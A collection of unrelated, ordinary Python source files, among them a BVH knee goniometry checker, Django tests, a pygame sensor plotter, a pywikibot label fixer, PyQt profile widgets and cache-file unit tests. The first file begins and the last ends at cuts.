archivo: Leg.py
descripción:
Este archivo contiene la clase Leg, la cual se utiliza para implementar la
rodilla izquierda y la derecha. Los estudios de goniometría para este hueso
se basan en los siguientes límites de los ángulos de Euler:
Z torsión no válida
X Flexión + y extensión -
Y rotación no válida
"""
from Bone import Bone
class Leg(Bone):
"""
Esta subclase implementa el estudio de goniometría para las rodillas en
el esqueleto del BVH. La jerarquía los llama "Leg".
"""
def __init__(self, ID=' ', Zp=0, Xp=0, Yp=0):
"""
Se inicializa este hueso con los siguientes parámetros
ID: identificador del bone. Ej: izquierdo/derecho
Cada posición del hueso se define con un vector de ángulos de Euler
(Z, X, Y) los cuales tienen una posición específica dentro del array
de la sección MOTION del BVH
Zp: índice del array MOTION que contiene el angulo de euler Z para ese hueso
Xp: índice del array MOTION que contiene el angulo de euler X para ese hueso
Yp: índice del array MOTION que contiene el angulo de euler Y para ese hueso
"""
self.ID = ID
self.Zp = Zp
self.Xp = Xp
self.Yp = Yp
#se llama al constructor de la super clase para acceder a todos los atributos
#de goniometría
Bone.__init__(self,
Name='Rodilla',
Zmin=-0.200000,
Zmax=0.200000,
Xmin=0.000000,
Xmax=150.000000,
Ymin=-1.000000,
Ymax=1.000000)
def Goniometry_check(self, MOTION, frame):
"""
Descripción:
Esta función se encarga de comparar el valor de los ángulos de Euler que
un hueso posee en un frame determinado, con el valor de los límites
goniométricos de ese hueso en particular. Si algún ángulo de Euler excede
los límites del movimiento humano, se reportará un glitch en ese frame
y se procederá a corregirlo en el arreglo MOTION.
argumentos:
MOTION: arreglo de 156 posiciones que contiene todos los ángulos de Euler
para cada hueso en un frame dado. El orden de cada hueso viene dado por
la sección HIERARCHY del BVH.
frame: cuadro del video de MoCap que se está analizando
"""
#Primero, definimos los valores de cada ángulo de Euler
Zeuler = MOTION[self.Zp]
Xeluer = MOTION[self.Xp]
Yeuler = MOTION[self.Yp]
glitch = False
#Exempt es una variable que se activa cuando detecta problemas de rotacion
#de ejes Z y Y en las rodillas
Exempt = False
ErrorMsg = ' existen glitches de '
#Variables para probar si hubo rotación de ejes y el esqueleto está agachado
rodilla_flex = Xeluer > 13.0 or Xeluer < -15.0
y_rot = Yeuler > 20.0 or Yeuler < -20.0
z_rot = Zeuler > 40.0 or Zeuler < -40.0
Rotacion_ejes = y_rot or z_rot
if rodilla_flex and Rotacion_ejes:
Exempt = True
if Exempt:
#Existen dos pruebas goniométricas distintas de acuerdo al nivel de flexión de las
#rodillas. En el caso de que las rodillas tengan un ángulo de flexión mayor a 45º o
#exista una rotacion de los eje Z y Y, debemos incrementar los límites de movilidad.
#en Z y Y. Esto debido al comportamiento de los huesos en el BVH, los cuales rotan
#los ejes Y y Z para representar movimientos de un esqueleto agachado.
#Esto ocurre debido a la pérdida de orientación del hueso,por parte de las cámaras
#en los ejes Z y Y.
#probamos límites nuevos en Z
if Zeuler < -160.000000:
#MOTION[self.Zp] no se le aplica restricción en Z
glitch = True
ErrorMsg += 'pérdida de orientación de los sensores en Z- | '
if Zeuler > 160.000000:
#MOTION[self.Zp] no se le aplica restricción en Z
glitch = True
ErrorMsg += 'pérdida de orientación de los sensores en Z+ | '
#aquí probamos nuevos límites en X
if Xeluer < -150.000000:
#MOTION[self.Xp] no se le aplica restricción en X
glitch = True
ErrorMsg += 'pérdida de orientación de los sensores en X- | '
if Xeluer > 150.000000:
#MOTION[self.Xp] no se le aplica restricción en X
glitch = True
ErrorMsg += 'pérdida de orientación de los sensores en X+ | '
#aquí probamos nuevos límites en Y
if Yeuler < -105.000000:
#MOTION[self.Yp] no se le aplica restricción en Y
glitch = True
ErrorMsg += 'pérdida de orientación de los sensores en Y- | '
if Yeuler > 105.000000:
#MOTION[self.Yp] no se le aplica restricción en Y
glitch = True
ErrorMsg += 'pérdida de orientación de los sensores en Y+ | '
else:
#probamos límites en Z
if Zeuler < self.Zmin:
MOTION[self.Zp] = self.Zmin
glitch = True
ErrorMsg += 'torsión | '
if Zeuler > self.Zmax:
MOTION[self.Zp] = self.Zmax
glitch = True
ErrorMsg += 'torsión | '
#aquí probamos límites en X
if Xeluer < self.Xmin:
MOTION[self.Xp] = self.Xmin
glitch = True
ErrorMsg += 'extension | '
if Xeluer > self.Xmax:
MOTION[self.Xp] = self.Xmax
glitch = True
ErrorMsg += 'flexion | '
#aquí probamos límites en Y
if Yeuler < self.Ymin:
MOTION[self.Yp] = self.Ymin
glitch = True
ErrorMsg += 'rotacion interna | '
if Yeuler > self.Ymax:
MOTION[self.Yp] = self.Ymax
glitch = True
ErrorMsg += 'rotacion externa | '
if glitch:
self.Report_glitch(ErrorMsg, frame)
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cadeau', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='artikel',
name='foto',
field=models.ImageField(upload_to='', blank=True, verbose_name='media/img'),
),
]
|
from django.test import TestCase
from ..models import Setting
class SettingModelTests(TestCase):
def test_real_value(self):
"""setting returns real value correctyly"""
setting_model = Setting(python_type='list', dry_value='')
self.assertEqual(setting_model.value, [])
setting_model = Setting(python_type='list',
dry_value='Arthur,Lancelot,Patsy')
self.assertEqual(setting_model.value,
['Arthur', 'Lancelot', 'Patsy'])
setting_model = Setting(python_type='list',
default_value='Arthur,Patsy')
self.assertEqual(setting_model.value,
['Arthur', 'Patsy'])
setting_model = Setting(python_type='list',
dry_value='Arthur,Robin,Patsy',
default_value='Arthur,Patsy')
self.assertEqual(setting_model.value,
['Arthur', 'Robin', 'Patsy'])
def test_set_value(self):
"""setting sets value correctyly"""
setting_model = Setting(python_type='int',
dry_value='42',
default_value='9001')
setting_model.value = 3000
self.assertEqual(setting_model.value, 3000)
self.assertEqual(setting_model.dry_value, '3000')
setting_model.value = None
self.assertEqual(setting_model.value, 9001)
self.assertEqual(setting_model.dry_value, None)
def test_field_extra(self):
"""field extra is set correctly"""
setting_model = Setting()
test_extra = {}
setting_model.field_extra = test_extra
self.assertEqual(setting_model.field_extra, test_extra)
test_extra = {'min_lenght': 5, 'max_length': 12}
setting_model.field_extra = test_extra
self.assertEqual(setting_model.field_extra, test_extra)
|
import json
import pytest
from boltons.iterutils import same
from ..pool import DEFAULT_MANAGER_IDS
from .test_cli import CLISubCommandTests, CLITableTests
@pytest.fixture
def subcmd():
return "installed"
class TestInstalled(CLISubCommandTests, CLITableTests):
@pytest.mark.parametrize("mid", DEFAULT_MANAGER_IDS)
def test_single_manager(self, invoke, subcmd, mid):
result = invoke("--manager", mid, subcmd)
assert result.exit_code == 0
self.check_manager_selection(result, {mid})
def test_json_parsing(self, invoke, subcmd):
result = invoke("--output-format", "json", subcmd)
assert result.exit_code == 0
data = json.loads(result.stdout)
assert set(data).issubset(DEFAULT_MANAGER_IDS)
for manager_id, info in data.items():
assert isinstance(manager_id, str)
assert isinstance(info, dict)
assert set(info) == {"errors", "id", "name", "packages"}
assert isinstance(info["errors"], list)
if info["errors"]:
assert same(map(type, info["errors"]), str)
assert isinstance(info["id"], str)
assert isinstance(info["name"], str)
assert isinstance(info["packages"], list)
assert info["id"] == manager_id
for pkg in info["packages"]:
assert isinstance(pkg, dict)
assert set(pkg) == {"id", "installed_version", "name"}
assert isinstance(pkg["id"], str)
assert isinstance(pkg["installed_version"], str)
assert isinstance(pkg["name"], str)
|
import gettext
from zope.interface import implements
from flumotion.admin.assistant.interfaces import IEncoderPlugin
from flumotion.admin.assistant.models import AudioEncoder
from flumotion.admin.gtk.basesteps import AudioEncoderStep
__version__ = "$Rev: 7268 $"
_ = gettext.gettext
class SpeexAudioEncoder(AudioEncoder):
componentType = 'speex-encoder'
def __init__(self):
super(SpeexAudioEncoder, self).__init__()
self.properties.bitrate = 11
def getProperties(self):
properties = super(SpeexAudioEncoder, self).getProperties()
properties.bitrate *= 1000
return properties
class SpeexStep(AudioEncoderStep):
name = 'Speex encoder'
title = _('Speex Encoder')
sidebarName = _('Speex')
componentType = 'speex'
icon = 'xiphfish.png'
docSection = 'help-configuration-assistant-encoder-speex'
docAnchor = ''
docVersion = 'local'
# WizardStep
def setup(self):
# Should be 2150 instead of 3 -> 3000
self.bitrate.set_range(3, 30)
self.bitrate.set_value(11)
self.bitrate.data_type = int
self.add_proxy(self.model.properties, ['bitrate'])
def workerChanged(self, worker):
self.model.worker = worker
self.wizard.requireElements(worker, 'speexenc')
class SpeexWizardPlugin(object):
implements(IEncoderPlugin)
def __init__(self, wizard):
self.wizard = wizard
self.model = SpeexAudioEncoder()
def getConversionStep(self):
return SpeexStep(self.wizard, self.model)
|
import pygame, os, time, random
import spidev
pygame.init()
os.environ['SDL_VIDEO_WINDOW_POS'] = 'center'
pygame.display.set_caption("Bounce Test")
pygame.event.set_allowed(None)
pygame.event.set_allowed([pygame.KEYDOWN,pygame.QUIT])
screenWidth = 1000 ; screenHight = 230
screen = pygame.display.set_mode([screenWidth,screenHight],0,32)
textHeight= 20
font = pygame.font.Font(None, textHeight)
backCol = (150,255,150) # background colour
inBuf = [ 0, 0]
def main():
n=0
loadResource()
while(1):
time.sleep(0.001)
checkForEvent()
readSensor()
display(n)
n +=1
if n > screenWidth:
n=0
lastX = -1; lastY = 0
pygame.draw.rect(screen,backCol,(0,0,screenWidth,screenHight+2),0)
def display(n):
global lastX,lastY
col = (180,64,0)
y0 = ch0Low - inBuf[0]//9
y1 = ch1Low - inBuf[1]//9
if n != 0:
pygame.draw.line(screen,col,(lastX ,lastY[0] ), (n ,y0 ),2)
pygame.draw.line(screen,(0,64,180),(lastX ,lastY[1] ), (n ,y1 ),2)
lastX = n
lastY[0] = y0 ; lastY[1] = y1
pygame.display.update()
def readSensor():
for i in range(0,2):
adc = spi.xfer2([1,(8+i)<<4,0]) # request channel
inBuf[i] = (adc[1] & 3)<<8 | adc[2] # join two bytes together
def loadResource():
global spi,lastX,lastY,ch0Low,ch1Low
spi = spidev.SpiDev()
spi.open(0,0)
spi.max_speed_hz=1000000
pygame.draw.rect(screen,backCol,(0,0,screenWidth,screenHight),0)
lastX = -1 ; lastY = [0,0]
ch0Low = screenHight/2 -2
ch1Low = screenHight -2
def terminate(): # close down the program
pygame.quit() # close pygame
os._exit(1)
def checkForEvent(): # see if we need to quit
event = pygame.event.poll()
if event.type == pygame.QUIT :
terminate()
if event.type == pygame.KEYDOWN :
if event.key == pygame.K_ESCAPE :
terminate()
if event.key == pygame.K_d : # screen dump
os.system("scrot")
if __name__ == '__main__':
main()
|
from Step import Step
class Welcome(Step):
def show(self):
self.render('Welcome.tmpl')
|
import sys, traceback, Ice
Ice.loadSlice('Latency.ice')
import Demo
class Server(Ice.Application):
def run(self, args):
if len(args) > 1:
print self.appName() + ": too many arguments"
return 1
adapter = self.communicator().createObjectAdapter("Latency")
adapter.add(Demo.Ping(), self.communicator().stringToIdentity("ping"))
adapter.activate()
self.communicator().waitForShutdown()
return 0
app = Server()
sys.exit(app.main(sys.argv, "config.server"))
|
import pywikibot
from pywikibot import pagegenerators
from .query_store import QueryStore
from .wikidata import WikidataEntityBot
class LabelsFixingBot(WikidataEntityBot):
use_from_page = False
def __init__(self, generator, **kwargs):
self.available_options.update({
'always': True,
'limit': 50,
})
super().__init__(**kwargs)
self.store = QueryStore()
self._generator = generator or self.custom_generator()
self.summary = 'remove prefix from [en] label'
@property
def generator(self):
return pagegenerators.PreloadingEntityGenerator(self._generator)
def custom_generator(self):
query = self.store.build_query('commons_labels',
limit=self.opt['limit'])
return pagegenerators.WikidataSPARQLPageGenerator(query, site=self.repo)
def treat_page_and_item(self, page, item):
if any(cl.target_equals('Q4167836') for cl in item.claims.get('P31', [])):
return
if item.getSitelink('commonswiki').startswith('Category:'):
if item.labels['en'].startswith('Category:'):
data = {'en': item.labels['en'][len('Category:'):]}
self.user_edit_entity(item, {'labels': data},
summary=self.summary)
def main(*args):
options = {}
local_args = pywikibot.handle_args(args)
site = pywikibot.Site()
genFactory = pagegenerators.GeneratorFactory(site=site)
for arg in local_args:
if genFactory.handle_arg(arg):
continue
if arg.startswith('-'):
arg, sep, value = arg.partition(':')
if value != '':
options[arg[1:]] = value if not value.isdigit() else int(value)
else:
options[arg[1:]] = True
generator = genFactory.getCombinedGenerator()
bot = LabelsFixingBot(generator=generator, site=site, **options)
bot.run()
if __name__ == '__main__':
main()
|
import random, os
from vg import config
from vg import utils
class SoundManager:
sounds = [] #constant across all instances
sets = {}
def __init__(self, filename=config.SOUND_YAML):
if not self.sounds:
self.load(filename)
def load(self, filename):
"""Load up the class copies of yaml data"""
self.sounds[:] = utils.yaml_load(filename)
for x in self.sounds:
for s in x['suitability']:
sounds = self.sets.setdefault(s, [])
sounds.append(x)
def pick_sounds(self, sound_group, exclude):
"""return a dictionary mapping event types to lists of sound
file names. sound_group is the kind of team asking for the
sounds, and exclude is a set of sound types/directories not to
be used (ie, have been used for other teams sounds)"""
#try a few times to get one from a new set. It is not
#impossible for a set to repeat, but is unlikely.
for i in range(10):
c = random.choice(self.sets.get(sound_group, self.sounds))
if c['directory'] not in exclude:
break
# make an independent copy, with directory prepended.
join = os.path.join
exclude.add(c['directory'])
sounds = {}
for k, v in c['sounds'].items():
sounds[k] = [ join(c['directory'], x) for x in v ]
return sounds
|
import ldac
import numpy as np
import pdb
class LDA(object):
"""LDA Class"""
def __init__(self, this):
self.this = this
self.ext = None
def __del__(self):
print("Destructor called!")
ldac.delete(self.this, self.ext)
def __reduce__(self):
buff = self.serialize()
return (LDA.from_string, (buff,))
@classmethod
def init(cls, k, iters, vocab, data=None):
if isinstance(vocab, int):
if vocab < 0:
raise ValueError('Vocab size must be non-negative!')
vocab = [''.join(['w',i]) for i in range(vocab)]
elif isinstance(vocab, list):
if len(vocab) > 0:
if not isinstance(vocab[0], str):
raise ValueError('Vocab must be list of stringss!')
else:
raise NotImplementedError('This type of vocab is not implemented')
ptr = ldac.new(k, iters, vocab)
return cls(ptr)
@classmethod
def from_string(cls, buff):
ptr = ldac.deserialize(buff)
return cls(ptr)
def fit(self, trngdata, testdata):
return ldac.fit(self.this, trngdata, testdata)
def evaluate(self, data):
return ldac.evaluate(self.this, data)
def predict(self, data):
pass
def get_topic_matrix(self):
if self.ext is None:
self.ext = ldac.topic_matrix(self.this)
return self.ext
def get_top_words(self, number=15):
return ldac.top_words(self.this, number)
def serialize(self):
return ldac.serialize(self.this)
|
from functools import partial
import uuid
from PyQt5 import (
QtCore,
QtGui,
QtWidgets,
)
from picard.const import DEFAULT_PROFILE_NAME
from picard.util import unique_numbered_title
from picard.ui import HashableListWidgetItem
class ProfileListWidget(QtWidgets.QListWidget):
def contextMenuEvent(self, event):
item = self.itemAt(event.x(), event.y())
if item:
menu = QtWidgets.QMenu(self)
rename_action = QtWidgets.QAction(_("Rename profile"), self)
rename_action.triggered.connect(partial(self.editItem, item))
menu.addAction(rename_action)
remove_action = QtWidgets.QAction(_("Remove profile"), self)
remove_action.triggered.connect(partial(self.remove_profile, item))
menu.addAction(remove_action)
menu.exec_(event.globalPos())
def keyPressEvent(self, event):
if event.matches(QtGui.QKeySequence.Delete):
self.remove_selected_profile()
elif event.key() == QtCore.Qt.Key_Insert:
self.add_profile()
else:
super().keyPressEvent(event)
def unique_profile_name(self, base_name=None):
if base_name is None:
base_name = _(DEFAULT_PROFILE_NAME)
existing_titles = [self.item(i).name for i in range(self.count())]
return unique_numbered_title(base_name, existing_titles)
def add_profile(self, name=None, profile_id=""):
if name is None:
name = self.unique_profile_name()
list_item = ProfileListWidgetItem(name=name, profile_id=profile_id)
list_item.setCheckState(QtCore.Qt.Checked)
self.insertItem(0, list_item)
self.setCurrentItem(list_item, QtCore.QItemSelectionModel.Clear
| QtCore.QItemSelectionModel.SelectCurrent)
def remove_selected_profile(self):
items = self.selectedItems()
if items:
self.remove_profile(items[0])
def remove_profile(self, item):
row = self.row(item)
msg = _("Are you sure you want to remove this profile?")
reply = QtWidgets.QMessageBox.question(self, _('Confirm Remove'), msg,
QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No)
if item and reply == QtWidgets.QMessageBox.Yes:
item = self.takeItem(row)
del item
class ProfileListWidgetItem(HashableListWidgetItem):
"""Holds a profile's list and text widget properties"""
def __init__(self, name=None, enabled=True, profile_id=""):
super().__init__(name)
self.setFlags(self.flags() | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEditable)
if name is None:
name = _(DEFAULT_PROFILE_NAME)
self.setText(name)
self.setCheckState(QtCore.Qt.Checked if enabled else QtCore.Qt.Unchecked)
if not profile_id:
profile_id = str(uuid.uuid4())
self.profile_id = profile_id
@property
def pos(self):
return self.listWidget().row(self)
@property
def name(self):
return self.text()
@property
def enabled(self):
return self.checkState() == QtCore.Qt.Checked
def get_all(self):
# tuples used to get pickle dump of settings to work
return (self.pos, self.name, self.enabled, self.profile_id)
def get_dict(self):
return {
'position': self.pos,
'title': self.name,
'enabled': self.enabled,
'id': self.profile_id,
}
|
from __future__ import print_function
try:
PermissionError
except NameError:
PermissionError = OSError
import unittest
import os
import datetime
from cachefile import Cachefile
class TestCache(Cachefile):
def __init__(self, cachedir):
super(TestCache, self).__init__(cachedir)
def apply_types(self, row):
row[self.TIME] = self.parse_time(row[self.TIME])
row['int'] = int(row['int'])
row['float'] = float(row['float'])
def fetch_one_day_data(self, day):
if day.year == 2018 and \
day.month == 8 and day.day == 1:
return [ { 'time': datetime.datetime(2018, 8, 1, 1, 0, 0),
'int': 42, 'str': "Hello, world", 'float':.001 },
{ 'time': datetime.datetime(2018, 8, 1, 13, 0, 0),
'int': 99, 'str': "Goodbye", 'float': 1000. }
]
elif day.year == 2018 and day.month == 2:
data = []
for hour in range(24):
data.append( { 'time': datetime.datetime(2018, 2, day.day,
hour, 0, 0),
'int': hour, 'str': "Hello, world",
'float': day.day + hour/100. })
return data
else:
morning = self.day_start(day)
return [ { 'time': morning + datetime.timedelta(hours=2),
'int': 42, 'str': "Hello, world", 'float': .001 },
{ 'time': morning + datetime.timedelta(hours=14),
'int': 99, 'str': "Goodbye", 'float': 1000.5 }
]
def clean_cachedir(self):
'''Remove all cache files from the cachedir.
'''
if not os.path.exists(self.cachedir):
return
for f in os.listdir(self.cachedir):
os.unlink(os.path.join(self.cachedir, f))
os.rmdir(self.cachedir)
class CacheTests(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(CacheTests, self).__init__(*args, **kwargs)
self.cache = TestCache("test-cachefile")
# executed prior to each test
def setUp(self):
self.cache.clean_cachedir()
pass
# executed after each test
def tearDown(self):
self.cache.clean_cachedir()
pass
def test_cache_just_starttime(self):
# Make sure cachefile is created
# Python2 csv.DictWriter doesn't preserve field order.
self.cache.fieldnames = [ 'time', 'int', 'str', 'float' ]
test_date = datetime.datetime(2018, 8, 1, 12, 0)
self.cache.get_data(test_date)
self.assertEqual(self.cache.cachedir,
os.path.expanduser('~/.cache/test-cachefile'))
cachefile = os.path.join(self.cache.cachedir,
test_date.strftime('%Y-%m-%d') + ".csv")
assert os.path.exists(cachefile)
with open(cachefile) as fp:
file_contents = fp.read()
self.assertEqual(file_contents, '''time,int,str,float
2018-08-01 01:00:00,42,"Hello, world",0.001
2018-08-01 13:00:00,99,Goodbye,1000.0
''')
def test_cache_no_times(self):
# Test fetching with no time specified
now = datetime.datetime.now()
data = self.cache.get_data()
for d in data:
self.assertEqual(d['time'].year, now.year)
self.assertEqual(d['time'].month, now.month)
self.assertEqual(d['time'].day, now.day)
cachefile = os.path.join(self.cache.cachedir,
now.strftime('%Y-%m-%d') + ".csv")
assert os.path.exists(cachefile)
def test_multiple_days(self):
starttime = datetime.datetime(2018, 2, 10, 0, 0)
endtime = datetime.datetime(2018, 2, 12, 12, 0)
data = self.cache.get_data(starttime, endtime)
# Make sure we got data from the full range:
self.assertEqual(data[0],
{'time': datetime.datetime(2018, 2, 10, 0, 0),
'int': 0,
'str': 'Hello, world',
'float': 10.0})
self.assertEqual(data[32],
{'time': datetime.datetime(2018, 2, 11, 8, 0),
'int': 8,
'str': 'Hello, world',
'float': 11.08})
self.assertEqual(data[-1],
{'time': datetime.datetime(2018, 2, 12, 23, 0),
'int': 23,
'str': 'Hello, world',
'float': 12.23})
# and that we cached data for all those days:
assert os.path.exists(os.path.join(self.cache.cachedir,
'2018-02-10.csv'))
assert os.path.exists(os.path.join(self.cache.cachedir,
'2018-02-11.csv'))
assert os.path.exists(os.path.join(self.cache.cachedir,
'2018-02-12.csv'))
def test_file_locking(self):
# test_date = datetime.datetime(2018, 8, 1, 12, 0)
# self.cache.get_data(test_date)
self.cache.fieldnames = [ "time", "one", "two" ]
cachefile = "/tmp/cachetest"
try:
os.unlink(cachefile)
except:
pass
realfp = self.cache.open_cache_file(cachefile)
self.cache.write_cache_line(realfp, { "time":
datetime.datetime(2018, 8, 1,
1, 0),
"one": 1,
"two": 2 })
with self.assertRaises(PermissionError):
secondfp = self.cache.open_cache_file("/tmp/cachetest")
self.cache.write_cache_line(realfp, { "time":
datetime.datetime(2018, 8, 1,
13, 0),
"one": 11,
"two": 22 })
with self.assertRaises(PermissionError):
thirdfp = self.cache.open_cache_file("/tmp/cachetest")
realfp.close()
with open(cachefile) as fp:
file_contents = fp.read()
self.assertEqual(file_contents, '''time,one,two
2018-08-01 01:00:00,1,2
2018-08-01 13:00:00,11,22
''')
def test_start_and_end_times(self):
# XXX Test day_start and day_end
# and test get_data() without start, end or both times
# and make sure it fetches data for the proper dates.
# Maybe make a class that returns date, year, month, day, hour, min, sec
midday = datetime.datetime(2018, 7, 15, 13, 0)
prevday = midday.replace(day = midday.day - 1)
nextday = midday.replace(day = midday.day + 1)
later = midday.replace(hour = 21)
# Test starttime only
starttime, endtime = self.cache.time_bounds(starttime=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, midday.hour)
self.assertEqual(starttime.minute, 0)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, 23)
self.assertEqual(endtime.minute, 59)
# Test full day
starttime, endtime = self.cache.time_bounds(day=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, 0)
self.assertEqual(starttime.minute, 0)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, 23)
self.assertEqual(endtime.minute, 59)
# Test endtime only
starttime, endtime = self.cache.time_bounds(endtime=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, 0)
self.assertEqual(starttime.minute, 0)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, midday.hour)
self.assertEqual(endtime.minute, midday.minute)
# Test endtime on an earlier day
with self.assertRaises(ValueError):
starttime, endtime = self.cache.time_bounds(starttime=midday,
endtime=prevday)
# Test endtime on a later day
with self.assertRaises(ValueError):
starttime, endtime = self.cache.time_bounds(starttime=midday,
endtime=nextday)
# Test full day with now
starttime, endtime = self.cache.time_bounds(day=midday, now=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, 0)
self.assertEqual(starttime.minute, 0)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, midday.hour)
self.assertEqual(endtime.minute, midday.minute)
# Test end time later than now
starttime, endtime = self.cache.time_bounds(starttime=midday,
endtime=later,
now=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, midday.hour)
self.assertEqual(starttime.minute, midday.minute)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, midday.hour)
self.assertEqual(endtime.minute, midday.minute)
if __name__ == '__main__':
unittest.main()
|
class Solution(object):
def rotate(self, matrix):
"""
Rotate nxn 2D matrix clockwise (in-place)
:type matrix: List[List[int]]
:rtype: void Do not return anything, modify matrix in-place instead.
| 1 2 3 | | 7 4 1 |
| 4 5 6 | | 8 5 2 |
| 7 8 9 | | 9 6 3 |
"""
n = len(matrix)
if n == 0 or n == 1:
return
matrix.reverse()
for i in xrange(n):
for j in xrange(i+1, n):
matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]
return
|
import pygtk
import gtk
from IsCoder.Constants import *
from IsCoder.Plugin import Plugin
import locale
import gettext
locale.setlocale(locale.LC_ALL, "")
gettext.bindtextdomain("iscoder", DataDir + "/locale")
gettext.textdomain("iscoder")
_ = gettext.gettext
plugin = Plugin(_("MP3"), "Audio")
|
""" Module for logging facilities """
import logging;
def init( logfile='logging.log', debug=False, verbose=False ):
"""
Initialize logging handler
A code logging handler is initialized with default values. It is returned a
logging handler for the user (see 'logging' package for more info).
By default, the returned handler will output log messages to a file called
'logging.log', in INFO level and no screen messages.
Input:
- logfile : Filename for logging messages
- debug : Use DEBUG level(?)
- verbose : Be verbose(?)
Output:
- logging.handler instance
"""
level = logging.INFO;
if ( debug ):
level=logging.DEBUG
logging.basicConfig(level=level,
format='%(asctime)s %(module)-25s : %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M:%S',
filename=logfile,
filemode='w')
# and set a simpler format for these messages
formatter = logging.Formatter('%(module)-20s : %(levelname)-8s %(message)s')
if ( verbose ):
# Write INFO messages or higher to the console
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# Tell the handler to use this format
console.setFormatter(formatter)
# Add the handler to the root logger
logging.getLogger('').addHandler(console)
return logging;
|
import pandas as pd
import numpy as np
def regression_set(df, target_key, initial_time, horizon, deltat=0):
n_horizon = _calc_horizon(df.index, horizon)
n_deltat = _calc_horizon(df.index, deltat)
for n in range(n_deltat):
df = _shift_features(df, target_key, n+1)
df = _shift_features(df, key=target_key, shift=-n_horizon, target=True)
df = df[df.index >= initial_time]
y = np.array(df[target_key + '_tau'])
X = np.asmatrix(df.drop(target_key + '_tau', axis=1))
return X, y
def classification_set(df, target_key, t0, horizon, deltat, nominal=True):
n_horizon = _calc_horizon(df.index, horizon)
n_deltat = _calc_horizon(df.index, deltat)
for n in range(n_deltat):
df = _shift_features(df, target_key, n+1)
df = _shift_features(df, key=target_key, shift=-n_horizon, target=True)
df = classification_feature(df, target_key + '_tau', nominal=nominal)
df = df[df.index >= t0]
y = np.array(df[target_key + '_tau'])
X = np.asmatrix(df.drop(target_key + '_tau', axis=1))
return X, y
def _shift_features(df, key, shift, target=False):
if target:
df[key + '_tau'] = df[key].shift(shift)
else:
df[key + '_' + str(shift)] = df[key].shift(shift)
df = df.dropna(axis=0)
return df
def _calc_horizon(index, horizon):
first = index[0]
for i in range(len(index)):
if index[i] >= first + horizon:
return i
def classification_feature(df, key, width=0.417, threshold=0.5, nominal=False, drop_key=True):
"""
Creates a classification of events based on the behavior of one of the features.
df: Pandas Dataframe
The dataframe of the data without classification index
key: String
A key of the dataframe according to which the classification is performed
width: Float
The width of the window, according to the index of the dataframe, for which
an event is considered as such
threshold: Float
The thresholding value above which the event is considered as such
:returns: Pandas Dataframe with a classification key added
"""
classification_list = np.array([])
k = 0
while True:
for i in range(k, len(df)):
if df[key][df.index[i]] >= threshold:
begin = i
break
begin = i
for i in range(begin+1, len(df)):
if df[key][df.index[i]] < threshold:
end = i-1
break
end = i
if df.index[end] - df.index[begin] > width:
for i in range(k, begin):
classification_list = np.append(classification_list, 'no' if nominal else int(0))
for i in range(begin, end+1):
classification_list = np.append(classification_list, 'yes' if nominal else int(1))
else:
for i in range(k, end+1):
classification_list = np.append(classification_list, 'no' if nominal else int(0))
k = end + 1
if end == len(df) -1:
break
if begin > end:
for i in range(k, len(df)):
classification_list = np.append(classification_list, 'no' if nominal else int(0))
break
df[key + '_class'] = pd.Series(classification_list, index=df.index)
if drop_key:
del df[key]
return df
|
import pyActiveCollab as pyac
import json
ac = pyac.activeCollab("~/.activeCollab", log_level="info")
print json.dumps(json.loads(ac.get_info()), indent=4, sort_keys=True)
|
Sphere()
Shrink()
Show()
Render()
|
from heppy.framework.analyzer import Analyzer
from heppy.statistics.tree import Tree
from heppy_fcc.analyzers.ntuple import *
from ROOT import TFile
class IsoParticleTreeProducer(Analyzer):
def beginLoop(self, setup):
super(IsoParticleTreeProducer, self).beginLoop(setup)
self.rootfile = TFile('/'.join([self.dirName,
'tree.root']),
'recreate')
self.tree = Tree( self.cfg_ana.tree_name,
self.cfg_ana.tree_title )
bookIsoParticle(self.tree, 'ptc')
def process(self, event):
self.tree.reset()
leptons = getattr(event, self.cfg_ana.leptons)
pdgids = [211, 22, 130]
for lepton in leptons:
for pdgid in pdgids:
iso = getattr(lepton, 'iso_{pdgid:d}'.format(pdgid=pdgid))
for ptc in iso.on_ptcs:
self.tree.reset()
fillIsoParticle(self.tree, 'ptc', ptc, lepton)
self.tree.tree.Fill()
def write(self, setup):
self.rootfile.Write()
self.rootfile.Close()
|
import pybot.globals as globals
import pybot.data as data
import re
import os
def pybotPrint(text, mode=""):
settings = globals.settings
if (data.toBool(settings.config["print"]["HTML"])):
print("<div class='pybot-out-" + mode + "'>" + text + "</div>")
else:
print(text)
globals.data.logs.append(text)
def checkIfCommand(text, *cmds_, addc=True):
found = False
cmds = list(cmds_)
i = 0
concat = ""
app = globals.settings.config['compatibility']['append_to_commands']
if app != '' and addc:
